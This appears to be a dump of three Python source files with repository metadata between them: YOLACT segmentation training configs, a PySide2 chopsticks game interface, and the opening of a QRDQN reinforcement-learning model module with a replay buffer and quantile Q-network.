    # During training, to match detections with gt, first compute the maximum gt IoU for each prior.
    # Then, any of those priors whose maximum overlap is over the positive threshold, mark as positive.
    # For any priors whose maximum is less than the negative iou threshold, mark them as negative.
    # The rest are neutral and not used in calculating the loss.
    'positive_iou_threshold': 0.5,
    'negative_iou_threshold': 0.5,

    # When using ohem, the ratio between positives and negatives (3 means 3 negatives to 1 positive)
    'ohem_negpos_ratio': 3,

    # If less than 1, anchors treated as a negative that have a crowd iou over this threshold with
    # the crowd boxes will be treated as a neutral.
    'crowd_iou_threshold': 1,

    # This is filled in at runtime by Yolact's __init__, so don't touch it
    'mask_dim': None,

    # Input image size.
    'max_size': 300,

    # Whether or not to do post processing on the cpu at test time
    'force_cpu_nms': True,

    # Whether to use mask coefficient cosine similarity nms instead of bbox iou nms
    'use_coeff_nms': False,

    # Whether or not to have a separate branch whose sole purpose is to act as the coefficients for coeff_diversity_loss
    # Remember to turn on coeff_diversity_loss, or these extra coefficients won't do anything!
    # To see their effect, also remember to turn on use_coeff_nms.
    'use_instance_coeff': False,
    'num_instance_coeffs': 64,

    # Whether or not to tie the mask loss / box loss to 0
    'train_masks': True,
    'train_boxes': True,
    # If enabled, the gt masks will be cropped using the gt bboxes instead of the predicted ones.
    # This speeds up training time considerably but results in much worse mAP at test time.
    'use_gt_bboxes': False,

    # Whether or not to preserve aspect ratio when resizing the image.
    # If True, this will resize all images to be max_size^2 pixels in area while keeping aspect ratio.
    # If False, all images are resized to max_size x max_size
    'preserve_aspect_ratio': False,

    # Whether or not to use the prediction module (c) from DSSD
    'use_prediction_module': False,

    # Whether or not to use the predicted coordinate scheme from Yolo v2
    'use_yolo_regressors': False,

    # For training, bboxes are considered "positive" if their anchors have a 0.5 IoU overlap
    # or greater with a ground truth box. If this is true, instead of using the anchor boxes
    # for this IoU computation, the matching function will use the predicted bbox coordinates.
    # Don't turn this on if you're not using yolo regressors!
    'use_prediction_matching': False,

    # A list of settings to apply after the specified iteration. Each element of the list should look like
    # (iteration, config_dict) where config_dict is a dictionary you'd pass into a config object's init.
    'delayed_settings': [],

    # Use command-line arguments to set this.
    'no_jit': False,

    'backbone': None,
    'name': 'base_config',

    # Fast Mask Re-scoring Network
    # Inspried by Mask Scoring R-CNN (https://arxiv.org/abs/1903.00241)
    # Do not crop out the mask with bbox but slide a convnet on the image-size mask,
    # then use global pooling to get the final mask score
    'use_maskiou': False,

    # Archecture for the mask iou network. A (num_classes-1, 1, {}) layer is appended to the end.
    'maskiou_net': [],

    # Discard predicted masks whose area is less than this
    'discard_mask_area': -1,

    'maskiou_alpha': 1.0,
    'rescore_mask': False,
    'rescore_bbox': True,
    'maskious_to_train': -1,
})
# ----------------------- YOLACT v1.0 CONFIGS ----------------------- #

yolact_base_config = coco_base_config.copy({
    'name': 'yolact_base',

    # Dataset stuff
    'dataset': coco2017_dataset,
    'num_classes': len(coco2017_dataset.class_names) + 1,

    # Image Size
    'max_size': 550,

    # Training params
    # NOTE(review): these lr_steps/max_iter differ from upstream YOLACT's
    # COCO schedule — presumably shortened for a custom dataset; verify.
    'lr_steps': (15000, 40000, 60000, 75000),
    'max_iter': 140000,

    # Backbone Settings
    'backbone': resnet101_backbone.copy({
        'selected_layers': list(range(1, 4)),
        'use_pixel_scales': True,
        'preapply_sqrt': False,
        'use_square_anchors': True, # This is for backward compatability with a bug

        'pred_aspect_ratios': [ [[1, 1/2, 2]] ]*5,
        'pred_scales': [[24], [48], [96], [192], [384]],
    }),

    # FPN Settings
    'fpn': fpn_base.copy({
        'use_conv_downsample': True,
        'num_downsample': 2,
    }),

    # Mask Settings
    'mask_type': mask_type.lincomb,
    'mask_alpha': 6.125,
    'mask_proto_src': 0,
    'mask_proto_net': [(256, 3, {'padding': 1})] * 3 + [(None, -2, {}), (256, 3, {'padding': 1})] + [(32, 1, {})],
    'mask_proto_normalize_emulate_roi_pooling': True,

    # Other stuff
    'share_prediction_module': True,
    'extra_head_net': [(256, 3, {'padding': 1})],

    'positive_iou_threshold': 0.5,
    'negative_iou_threshold': 0.4,

    'crowd_iou_threshold': 0.7,

    'use_semantic_segmentation_loss': True,
})

# Same model at a 400px input; anchor scales shrink proportionally.
yolact_im400_config = yolact_base_config.copy({
    'name': 'yolact_im400',

    'max_size': 400,
    'backbone': yolact_base_config.backbone.copy({
        'pred_scales': [[int(x[0] / yolact_base_config.max_size * 400)] for x in yolact_base_config.backbone.pred_scales],
    }),
})

# Same model at a 700px input; anchor scales grow proportionally.
yolact_im700_config = yolact_base_config.copy({
    'name': 'yolact_im700',

    'masks_to_train': 300,
    'max_size': 700,
    'backbone': yolact_base_config.backbone.copy({
        'pred_scales': [[int(x[0] / yolact_base_config.max_size * 700)] for x in yolact_base_config.backbone.pred_scales],
    }),
})

yolact_darknet53_config = yolact_base_config.copy({
    'name': 'yolact_darknet53',

    'backbone': darknet53_backbone.copy({
        'selected_layers': list(range(2, 5)),

        'pred_scales': yolact_base_config.backbone.pred_scales,
        'pred_aspect_ratios': yolact_base_config.backbone.pred_aspect_ratios,
        'use_pixel_scales': True,
        'preapply_sqrt': False,
        'use_square_anchors': True, # This is for backward compatability with a bug
    }),
})

yolact_resnet50_config = yolact_base_config.copy({
    'name': 'yolact_resnet50',

    'backbone': resnet50_backbone.copy({
        'selected_layers': list(range(1, 4)),

        'pred_scales': yolact_base_config.backbone.pred_scales,
        'pred_aspect_ratios': yolact_base_config.backbone.pred_aspect_ratios,
        'use_pixel_scales': True,
        'preapply_sqrt': False,
        'use_square_anchors': True, # This is for backward compatability with a bug
    }),
})

yolact_resnet50_pascal_config = yolact_resnet50_config.copy({
    'name': None, # Will default to yolact_resnet50_pascal

    # Dataset stuff
    'dataset': pascal_sbd_dataset,
    'num_classes': len(pascal_sbd_dataset.class_names) + 1,

    'max_iter': 120000,
    'lr_steps': (60000, 100000),

    'backbone': yolact_resnet50_config.backbone.copy({
        'pred_scales': [[32], [64], [128], [256], [512]],
        'use_square_anchors': False,
    })
})

# Custom fine-tune of the DarkNet53 model on the single-class dataset.
yolact_darknet_person_config = yolact_darknet53_config.copy({
    'name': 'darknet_2',
    'dataset': shivam_dataset,
    'num_classes': len(shivam_dataset.class_names)+1,
    'max_iter': 80000,
    # 'freeze_bn': True,
    'max_size': 512
})

# Custom fine-tune of the 700px model on the person dataset.
# NOTE(review): max_size 512 overrides im700's 700 but the inherited
# pred_scales were computed for 700 — confirm this was intentional.
yolact_im700_person_config = yolact_im700_config.copy({
    'name': 'im700_2',
    'dataset': person_dataset,
    'num_classes': len(person_dataset.class_names)+1,
    'max_iter': 80000,
    # 'freeze_bn': True,
    'max_size': 512
})
# ----------------------- YOLACT++ CONFIGS ----------------------- #
# YOLACT++ adds deformable convolutions (DCN), multi-scale anchors, and
# the fast mask re-scoring (maskiou) branch on top of the v1.0 configs.

yolact_plus_base_config = yolact_base_config.copy({
    'name': 'yolact_plus_base',

    'backbone': resnet101_dcn_inter3_backbone.copy({
        'selected_layers': list(range(1, 4)),

        'pred_aspect_ratios': [ [[1, 1/2, 2]] ]*5,
        'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
        'use_pixel_scales': True,
        'preapply_sqrt': False,
        'use_square_anchors': False,
    }),

    'use_maskiou': True,
    'maskiou_net': [(8, 3, {'stride': 2}), (16, 3, {'stride': 2}), (32, 3, {'stride': 2}), (64, 3, {'stride': 2}), (128, 3, {'stride': 2})],
    'maskiou_alpha': 25,
    'rescore_bbox': False,
    'rescore_mask': True,

    'discard_mask_area': 5*5,
})

yolact_plus_resnet50_config = yolact_plus_base_config.copy({
    'name': 'yolact_plus_resnet50',

    'backbone': resnet50_dcnv2_backbone.copy({
        'selected_layers': list(range(1, 4)),

        'pred_aspect_ratios': [ [[1, 1/2, 2]] ]*5,
        'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
        'use_pixel_scales': True,
        'preapply_sqrt': False,
        'use_square_anchors': False,
    }),
})

# Custom fine-tune of YOLACT++ (ResNet101) on the single-class dataset.
yolact_plus_resnet101_person_config = yolact_plus_base_config.copy({
    'name': 'yolact_plus_101',
    'dataset': shivam_dataset,
    'num_classes': len(shivam_dataset.class_names)+1,
    'max_iter': 100000,
    # 'freeze_bn': True,
    'max_size': 512
})

# YOLACT++ (ResNet50) fine-tuned on the COCO person-only split with a
# short 10k-iteration schedule and a reduced learning rate.
yolact_plus_resnet50_person_config = yolact_plus_base_config.copy({
    'name': 'yolact_plus_resnet50_person',

    'backbone': resnet50_dcnv2_backbone.copy({
        'selected_layers': list(range(1, 4)),

        'pred_aspect_ratios': [ [[1, 1/2, 2]] ]*5,
        'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in [24, 48, 96, 192, 384]],
        'use_pixel_scales': True,
        'preapply_sqrt': False,
        'use_square_anchors': False,
    }),

    'dataset': coco2017_dataset_person_1,
    'num_classes': len(coco2017_dataset_person_1.class_names) + 1,

    # Training params
    'max_iter': 10000,
    'lr': 1e-4,
    'momentum': 0.9,
    'decay': 5e-4,
    'gamma': 0.1,
    'lr_steps': (.35 * 10000, .75 * 10000, .88 * 10000, .93 * 10000),
})
# ---------------------------------------------------------------------------
# OCHuman / Cityscapes experiment configs.
#
# The original file repeated the same ~20-line yolact_plus_base_config
# variant once per experiment.  The helper below builds one such config;
# only the fields that actually differ between experiments are parameters.
# All public *_config names and their field values are preserved exactly.
# ---------------------------------------------------------------------------

def _yolact_plus_r50_exp_config(name, dataset, max_iter,
                                ratios=(1, 1/2, 2),
                                scale_bases=(24, 48, 96, 192, 384),
                                **extra):
    '''Build a YOLACT++ ResNet50-DCNv2 experiment config.

    Args:
        name (str): Config name.
        dataset: Dataset config object (must expose `class_names`).
        max_iter (int): Training iterations. `lr_steps` are derived as
            fixed fractions (.35/.75/.88/.93) of this value, matching the
            original hand-written configs.
        ratios (tuple, optional): Anchor aspect ratios, replicated across
            all 5 prediction levels. Defaults to (1, 1/2, 2).
        scale_bases (tuple, optional): Base anchor scale per FPN level.
        **extra: Additional top-level config overrides
            (e.g. `augment_expand=False`, `preserve_aspect_ratio=True`).

    Returns:
        A copy of `yolact_plus_base_config` with the overrides applied.
    '''
    overrides = {
        'name': name,

        'backbone': resnet50_dcnv2_backbone.copy({
            'selected_layers': list(range(1, 4)),
            # Same inner list replicated across the 5 levels, as in the
            # original `[ [[...]] ]*5` expressions.
            'pred_aspect_ratios': [[list(ratios)]] * 5,
            'pred_scales': [[i * 2 ** (j / 3.0) for j in range(3)] for i in scale_bases],
            'use_pixel_scales': True,
            'preapply_sqrt': False,
            'use_square_anchors': False,
        }),

        'dataset': dataset,
        'num_classes': len(dataset.class_names) + 1,

        # Training params
        'max_iter': max_iter,
        'lr_steps': (.35 * max_iter, .75 * max_iter, .88 * max_iter, .93 * max_iter),
    }
    overrides.update(extra)
    return yolact_plus_base_config.copy(overrides)

# Aspect ratios tuned towards (tall) person instances, used by several
# of the Cityscapes experiments below.
_PERSON_RATIOS = (1/2, 1/4, 1)

# --- OCHuman experiments ---
yolact_plus_resnet50_ochuman_exp1_config = _yolact_plus_r50_exp_config(
    'yolact_plus_resnet50_ochuman_exp1', ochuman_dataset, 7000)

yolact_plus_resnet50_ochuman_exp2_config = _yolact_plus_r50_exp_config(
    'yolact_plus_resnet50_ochuman_exp2', ochuman_dataset, 3000)

# NOTE(review): exp3 was byte-identical to exp2 in the original file
# (apart from the name); kept for checkpoint/name compatibility.
yolact_plus_resnet50_ochuman_exp3_config = _yolact_plus_r50_exp_config(
    'yolact_plus_resnet50_ochuman_exp3', ochuman_dataset, 3000)

# --- Cityscapes experiments (augment_expand disabled to avoid memory
# overflow, as in the original configs) ---
yolact_plus_resnet50_cityscapes_exp4_config = _yolact_plus_r50_exp_config(
    'yolact_plus_resnet50_cityscapes_exp4', cityscapes_dataset, 1500,
    augment_expand=False)

yolact_plus_resnet50_cityscapes_exp5_config = _yolact_plus_r50_exp_config(
    'yolact_plus_resnet50_cityscapes_exp5', cityscapes_dataset, 1500,
    ratios=(1/3, 1/4, 1/2),
    augment_expand=False)

yolact_plus_resnet50_cityscapes_exp6_config = _yolact_plus_r50_exp_config(
    'yolact_plus_resnet50_cityscapes_exp6', cityscapes_dataset, 1500,
    ratios=_PERSON_RATIOS,
    augment_expand=False)

yolact_plus_resnet50_cityscapes_exp7_config = _yolact_plus_r50_exp_config(
    'yolact_plus_resnet50_cityscapes_exp7', cityscapes_dataset, 1500,
    ratios=_PERSON_RATIOS,
    scale_bases=(32, 64, 128, 256, 512),
    augment_expand=False)

yolact_plus_resnet50_cityscapes_exp8_config = _yolact_plus_r50_exp_config(
    'yolact_plus_resnet50_cityscapes_exp8', cityscapes_dataset, 1500,
    ratios=_PERSON_RATIOS,
    preserve_aspect_ratio=True,  # keep the original image aspect ratio
    augment_expand=False)

yolact_plus_resnet50_cityscapes_exp9_config = _yolact_plus_r50_exp_config(
    'yolact_plus_resnet50_cityscapes_exp9', cityscapes_dataset, 3000,
    ratios=_PERSON_RATIOS,
    augment_expand=False)

yolact_plus_resnet50_cityscapes_exp10_config = _yolact_plus_r50_exp_config(
    'yolact_plus_resnet50_cityscapes_exp10', cityscapes_dataset, 40000,
    ratios=_PERSON_RATIOS,
    augment_expand=False)

yolact_plus_resnet50_cityscapes_exp11_config = _yolact_plus_r50_exp_config(
    'yolact_plus_resnet50_cityscapes_exp11', cityscapes_dataset, 1500,
    augment_expand=False)

# NOTE(review): exp12/exp13 differed from exp11 only in the (commented-out)
# learning rate in the original file; the effective configs are identical.
yolact_plus_resnet50_cityscapes_exp12_config = _yolact_plus_r50_exp_config(
    'yolact_plus_resnet50_cityscapes_exp12', cityscapes_dataset, 1500,
    augment_expand=False)

yolact_plus_resnet50_cityscapes_exp13_config = _yolact_plus_r50_exp_config(
    'yolact_plus_resnet50_cityscapes_exp13', cityscapes_dataset, 1500,
    augment_expand=False)

yolact_plus_resnet50_cityscapes_exp14_config = _yolact_plus_r50_exp_config(
    'yolact_plus_resnet50_cityscapes_exp14', cityscapes_dataset, 1500,
    ratios=_PERSON_RATIOS,
    augment_expand=False)

yolact_plus_resnet50_cityscapes_exp15_config = _yolact_plus_r50_exp_config(
    'yolact_plus_resnet50_cityscapes_exp15', cityscapes_dataset, 3000,
    ratios=_PERSON_RATIOS,
    augment_expand=False)

yolact_plus_resnet50_cityscapes_exp16_config = _yolact_plus_r50_exp_config(
    'yolact_plus_resnet50_cityscapes_exp16', cityscapes_dataset, 6000,
    ratios=_PERSON_RATIOS,
    augment_expand=False)
# Default config
cfg = yolact_base_config.copy()

def set_cfg(config_name:str):
    """ Sets the active config. Works even if cfg is already imported! """
    global cfg

    # Note this is not just an eval because I'm lazy, but also because it can
    # be used like ssd300_config.copy({'max_size': 400}) for extreme fine-tuning
    # SECURITY NOTE(review): eval() executes arbitrary Python; only call this
    # with trusted, programmer-supplied strings (e.g. CLI preset names).
    cfg.replace(eval(config_name))

    if cfg.name is None:
        # Derive a display name from the variable name, e.g.
        # 'yolact_resnet50_pascal_config' -> 'yolact_resnet50_pascal'.
        cfg.name = config_name.split('_config')[0]

def set_dataset(dataset_name:str):
    """ Sets the dataset of the current config. """
    # Same eval() caveat as set_cfg: dataset_name must be trusted.
    cfg.dataset = eval(dataset_name)
| [
"noreply@github.com"
] | SHIVAM3052.noreply@github.com |
11564982938ee31a8e00330067dd8ceab24242ea | 20f8804c95ab680291771105ff2ac82a440a8e22 | /game_gui2.py | d5afe9a24f3a1078209e08f878a5945d3b5983ea | [] | no_license | azidanit/FP-KB-2020-Ayo-Main-Game | d685e746ea55a5756c3fbf0cd3484ce052adb2b9 | 25c401e2fa8837112deae9c72904bc7c4335b797 | refs/heads/master | 2022-08-06T16:03:38.785524 | 2020-05-30T02:07:52 | 2020-05-30T02:07:52 | 259,441,963 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,959 | py | from PySide2 import QtWidgets, QtGui
from PySide2.QtCore import Slot, Signal
from Assets.Ui_Form import Ui_Form
from TheGame import TheGame
from GameState2 import GameState
class GameGui(Ui_Form):
    '''Qt GUI controller for the chopsticks ("Ayo Main") game.

    Wires the generated Ui_Form widgets to a ``TheGame`` instance: clicks
    on the hand labels are translated into move indices emitted through
    ``playerTurnSignal``; game-state updates arrive back via
    ``TheGame.resultStateSignal``.
    '''

    # Emitted with the chosen move index. From the click handlers below:
    # 0/1 = player's left hand hits AI's left/right, 2/3 = player's right
    # hand hits AI's right/left, 4 = a second own-hand click in a row
    # (NOTE(review): presumably a "split"/transfer move -- confirm against
    # TheGame.playGame).
    playerTurnSignal = Signal(int)

    def __init__(self, Form):
        '''Install the UI into *Form*, wire signals and show the window.

        Args:
            Form (QtWidgets.QWidget): top-level widget hosting the UI.
        '''
        super().__init__()
        self.the_game = TheGame()
        self.setupUi(Form)
        # Start on the home screen; the in-game frame is revealed by Start.
        self.ingame_frame.hide()
        self.home_frame.raise_()
        self.connectWidget()
        self.initGuiProperty()
        Form.show()
        # Which of the player's own hands is currently selected:
        # "left", "right", or "" for none.
        self.clicked_player = ""
        # self.ai_clicked = None
        # self.the_game.start()

    def connectWidget(self):
        '''Hook up button/label events and cross-thread game signals.'''
        self.start_button.clicked.connect(self.startButtonClicked)
        # QLabel has no clicked signal, so mousePressEvent is overridden directly.
        self.player_left.mousePressEvent = self.playerLeftClicked
        self.player_right.mousePressEvent = self.playerRightClicked
        self.ai_left.mousePressEvent = self.aiLeftClicked
        self.ai_right.mousePressEvent = self.aiRightClicked
        self.playerTurnSignal.connect(self.the_game.playGame)
        self.the_game.resultStateSignal.connect(self.stateResultCallback)

    def initGuiProperty(self):
        '''Clear the player labels and show both hands with value 1.'''
        self.player_left.setText("")
        self.player_right.setText("")
        self.changePlayerLeftHandTo(1)
        self.changePlayerRightHandTo(1)
        # self.ai_left.setText("")
        # self.ai_right.setText("")

    @Slot(object)
    def stateResultCallback(self, game_state: GameState):
        '''Refresh the hand displays from a new game state.

        Per the indexing below, ``game_state.values[0]`` holds the
        player's (left, right) hand counts and ``values[1]`` the AI's.
        '''
        print("SLOT STATE ")
        game_state.print()
        self.changePlayerLeftHandTo(game_state.values[0][0])
        self.changePlayerRightHandTo(game_state.values[0][1])
        # self.player_left.setText(str(game_state.values[0][0]))
        # self.player_right.setText(str(game_state.values[0][1]))
        # AI hands are shown as plain numbers, not sprites.
        self.ai_left.setText(str(game_state.values[1][0]))
        self.ai_right.setText(str(game_state.values[1][1]))

    def changePlayerLeftHandTo(self, number):
        '''Show the left-hand sprite for *number* fingers.'''
        # self.player_left.setPixmap()
        image_hand = QtGui.QPixmap("Assets/Player1/"+str(number)+"Kiri.png")
        self.player_left.setPixmap(image_hand)
        self.player_left.setScaledContents(True)
        pass

    def changePlayerRightHandTo(self, number):
        '''Show the right-hand sprite for *number* fingers.'''
        # self.player_right.setPixmap()
        image_hand = QtGui.QPixmap("Assets/Player1/" + str(number) + "Kanan.png")
        self.player_right.setPixmap(image_hand)
        self.player_right.setScaledContents(True)
        pass

    def playerLeftClicked(self, event):
        '''Select the player's left hand; a second own-hand click while a
        hand is already selected emits move 4 and clears the selection.'''
        if self.clicked_player != "":
            self.playerTurnSignal.emit(4)
            self.clicked_player = ""
        else:
            self.clicked_player = "left"

    def playerRightClicked(self, event):
        '''Select the player's right hand; see playerLeftClicked.'''
        if self.clicked_player != "":
            self.playerTurnSignal.emit(4)
            self.clicked_player = ""
        else:
            self.clicked_player = "right"

    def aiLeftClicked(self, event):
        '''Attack the AI's left hand with the currently selected hand.'''
        # self.ai_clicked = "left"
        if (self.clicked_player == 'left'):
            self.playerTurnSignal.emit(0)
        elif self.clicked_player == 'right':
            self.playerTurnSignal.emit(3)
        self.clicked_player = ""

    def aiRightClicked(self, event):
        '''Attack the AI's right hand with the currently selected hand.'''
        # self.ai_clicked = "right"
        if (self.clicked_player == 'left'):
            self.playerTurnSignal.emit(1)
        elif self.clicked_player == 'right':
            self.playerTurnSignal.emit(2)
        self.clicked_player = ""

    def startButtonClicked(self):
        '''Switch from the home screen to the in-game screen.'''
        self.home_frame.hide()
        self.ingame_frame.raise_()
        self.ingame_frame.show()
        # self.the_game.start()

    def exitPressed(self):
        '''Stop the game thread and close the GUI.'''
        self.the_game.stop()
        # NOTE(review): Ui_Form may not define exit(); verify this method
        # exists on the base class or replace with the host widget's close().
        self.exit()

    def closeEvent(self, event):
        # NOTE(review): closeEvent is a QWidget hook; whether this class
        # ever receives it depends on Ui_Form's base class -- verify.
        # `sys` here relies on the `import sys` in the __main__ guard below.
        print("QUIT BROOO")
        self.exitPressed()
        sys.exit()
if __name__ == "__main__":
    import sys

    # Build the Qt application, hand the root widget to the GUI
    # controller (which installs the UI and shows it), then enter the
    # Qt event loop until the window is closed.
    qt_app = QtWidgets.QApplication(sys.argv)
    root_widget = QtWidgets.QWidget()
    controller = GameGui(root_widget)
    sys.exit(qt_app.exec_())
"azidan.it@gmail.com"
] | azidan.it@gmail.com |
df6e6e69e1c13991b7bd340db0e3092655522236 | c328467ea14424f35cca4fc756488ece38b88272 | /unstable_baselines/algo/d/qrdqn/model.py | cb6ed37aac33e446701fe16a7a429157ea5416b2 | [
"MIT"
] | permissive | Ending2015a/unstable_baselines | 4b2d44f0bd46d2ba75b02a138f9218114317a5ee | 1d304115406f6e29186cedb0160811d4139e2733 | refs/heads/master | 2023-07-31T21:09:01.809727 | 2021-09-17T08:54:45 | 2021-09-17T08:54:45 | 338,553,782 | 10 | 0 | MIT | 2021-09-17T08:45:50 | 2021-02-13T10:55:54 | Python | UTF-8 | Python | false | false | 37,547 | py | __copyright__ = '''
The MIT License (MIT)
Copyright (c) 2021 Joe Hsiao
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
OR OTHER DEALINGS IN THE SOFTWARE.
'''
__license__ = 'MIT'
# --- built in ---
import os
import sys
import time
import random
import datetime
# --- 3rd party ---
import gym
import numpy as np
import tensorflow as tf
# --- my module ---
from unstable_baselines import logger
from unstable_baselines.base import (SavableModel,
TrainableModel)
from unstable_baselines.bugs import ReLU
from unstable_baselines.sche import Scheduler
from unstable_baselines.utils import (is_image_observation,
preprocess_observation,
get_input_tensor_from_space)
# create logger
LOG = logger.getLogger('QRDQN')
# === Buffers ===
class ReplayBuffer():
    '''Fixed-capacity circular buffer of environment transitions.

    Storage arrays are allocated lazily on the first `add()` call,
    matching the shapes and dtypes of the incoming batch. Once the write
    cursor wraps past `buffer_size`, the oldest samples are overwritten.
    '''

    # Field names double as attribute names for the storage arrays.
    _FIELDS = ('obss', 'acts', 'next_obss', 'rews', 'dones')

    def __init__(self, buffer_size):
        self.buffer_size = buffer_size
        self.reset()

    def reset(self):
        '''Empty the buffer and drop all storage arrays.'''
        self.pos = 0
        self.full = False
        for field in self._FIELDS:
            setattr(self, field, None)

    def add(self, observations, next_observations, actions, rewards, dones):
        '''Append one batch of transitions (one entry per parallel env).

        Args:
            observations (np.ndarray): batch of observations,
                shape (n_envs, *obs_shape).
            next_observations (np.ndarray): successor observations,
                same shape as `observations`.
            actions (np.ndarray): discrete actions, shape (n_envs, ...).
            rewards (np.ndarray): rewards, shape (n_envs, ...).
            dones (np.ndarray): episode-termination flags, shape (n_envs, ...).
        '''
        batch = {
            'obss':      np.asarray(observations),
            'next_obss': np.asarray(next_observations),
            'acts':      np.asarray(actions),
            'rews':      np.asarray(rewards),
            'dones':     np.asarray(dones),
        }
        n_env = batch['obss'].shape[0]

        if self.obss is None:
            # Lazily allocate storage matching the first batch's layout.
            for field in self._FIELDS:
                template = batch[field]
                setattr(self, field,
                        np.zeros((self.buffer_size,) + template.shape[1:],
                                 dtype=template.dtype))

        # Circular write: indices wrap around the end of the buffer.
        indices = np.arange(self.pos, self.pos + n_env) % self.buffer_size
        for field in self._FIELDS:
            getattr(self, field)[indices, ...] = batch[field].copy()

        # Advance the cursor; mark full once it has wrapped at least once.
        self.pos += n_env
        if self.pos >= self.buffer_size:
            self.full = True
            self.pos %= self.buffer_size

    def __len__(self):
        return self.buffer_size if self.full else self.pos

    def __call__(self, batch_size=None):
        '''Uniformly sample a batch of stored transitions.

        Args:
            batch_size (int, optional): number of samples; defaults to the
                current buffer size.

        Returns:
            tuple: (observations, actions, next_observations, dones, rewards)
                arrays, each with leading dimension `batch_size`.
        '''
        size = len(self) if batch_size is None else batch_size
        picks = np.random.randint(0, len(self), size=size)
        return self._get_samples(picks)

    def _get_samples(self, batch_inds):
        # Note the return order: dones come before rewards.
        return (self.obss[batch_inds],
                self.acts[batch_inds],
                self.next_obss[batch_inds],
                self.dones[batch_inds],
                self.rews[batch_inds])
# === Networks ===
class NatureCnn(tf.keras.Model):
    '''CNN feature extractor from "Playing Atari with Deep Reinforcement
    Learning": three conv+ReLU stages, flatten, then a 512-d dense layer.
    '''

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # (filters, kernel_size, stride) of the three conv stages.
        conv_specs = ((32, 8, 4), (64, 4, 2), (64, 3, 1))
        stack = []
        for idx, (filters, kernel, stride) in enumerate(conv_specs, start=1):
            stack.append(tf.keras.layers.Conv2D(filters, kernel, stride,
                                                name='conv{}'.format(idx)))
            stack.append(ReLU(name='relu{}'.format(idx)))
        stack.append(tf.keras.layers.Flatten(name='flatten'))
        stack.append(tf.keras.layers.Dense(512, name='fc'))
        stack.append(ReLU(name='relu4'))
        self._layers = stack

    @tf.function
    def call(self, inputs, training=False):
        '''Map a batch of images (batch, height, width, channel) to
        latent vectors by applying the layer stack in order.

        Args:
            inputs (tf.Tensor): 4-D batch of observations.
            training (bool, optional): Training mode. Defaults to False.

        Returns:
            tf.Tensor: Latent vectors.
        '''
        latent = inputs
        for layer in self._layers:
            latent = layer(latent)
        return latent
# Mlp feature extractor
class MlpNet(tf.keras.Model):
    '''MLP feature extractor: flatten followed by two 64-unit
    fully-connected + ReLU layers.
    '''

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        stack = [tf.keras.layers.Flatten()]
        for idx in (1, 2):
            stack.append(tf.keras.layers.Dense(64, name='fc{}'.format(idx)))
            stack.append(ReLU(name='relu{}'.format(idx)))
        self._layers = stack

    @tf.function
    def call(self, inputs, training=False):
        '''Map a batch of observations to latent vectors.

        Args:
            inputs (tf.Tensor): batch observations, shape
                (batch, obs_space.shape).
            training (bool, optional): Training mode. Defaults to False.

        Returns:
            tf.Tensor: Latent vectors.
        '''
        latent = inputs
        for layer in self._layers:
            latent = layer(latent)
        return latent
# Quantile Q-value network
class QuantileQNet(tf.keras.Model):
    '''Quantile Q-value head: a single dense layer producing
    act_space.n * n_quantiles outputs, reshaped per action.
    '''

    def __init__(self, action_space, n_quantiles, **kwargs):
        super().__init__(**kwargs)
        # One flat dense output, later reshaped to
        # (batch, n_actions, n_quantiles).
        self._layers = [tf.keras.layers.Dense(action_space.n * n_quantiles)]
        # target output shape (leading -1 keeps the batch dimension free)
        self._o_shape = (-1, action_space.n, n_quantiles)

    @tf.function
    def call(self, inputs, training=False):
        '''Predict quantile Q values from latent vectors.

        Args:
            inputs (tf.Tensor): latent vectors, shape (batch, latent_size),
                tf.float32.
            training (bool, optional): Training mode. Defaults to False.

        Returns:
            tf.Tensor: quantile Q values, shape
                (batch, act_space.n, n_quantiles).
        '''
        flat = inputs
        for layer in self._layers:
            flat = layer(flat)
        return tf.reshape(flat, self._o_shape)
# === Agent, Model ===
class Agent(SavableModel):
    '''QRDQN agent: a feature extractor (CNN or MLP) feeding a quantile
    Q-value head. Networks are built lazily via setup_model().'''

    def __init__(self, observation_space, action_space, n_quantiles=200, force_mlp=False, **kwargs):
        '''QRDQN Agent

        Args:
            observation_space (gym.Spaces): The observation space of the environment.
                Can be None for delayed setup.
            action_space (gym.Spaces): The action space of the environment.
                Can be None for delayed setup.
            n_quantiles (int, optional): Number of quantiles. Default to 200.
            force_mlp (bool, optional): Force to use MLP feature extractor.
                Defaults to False.
        '''
        super().__init__(**kwargs)
        self.n_quantiles = n_quantiles
        self.force_mlp = force_mlp
        # --- Initialize ---
        # Networks stay None until setup_model() is called, so the agent
        # can be constructed with (None, None) and configured later.
        self.observation_space = None
        self.action_space = None
        self.net = None
        self.q_net = None
        if (observation_space is not None) and (action_space is not None):
            self.setup_model(observation_space, action_space)

    def setup_model(self, observation_space, action_space):
        '''Setup model and networks

        Args:
            observation_space (gym.Spaces): The observation space of the
                environment.
            action_space (gym.Spaces): The action space of the environment.
        '''
        self.observation_space = observation_space
        self.action_space = action_space
        # --- setup model ---
        # CNN for image observations, MLP otherwise (or when forced).
        if (is_image_observation(observation_space)
                and (not self.force_mlp)):
            self.net = NatureCnn()
        else:
            self.net = MlpNet()
        self.q_net = QuantileQNet(action_space, n_quantiles=self.n_quantiles)
        # construct networks
        # Run one dummy forward pass so all layer variables are created.
        inputs = get_input_tensor_from_space(observation_space)
        outputs = self.net(inputs)
        self.q_net(outputs)

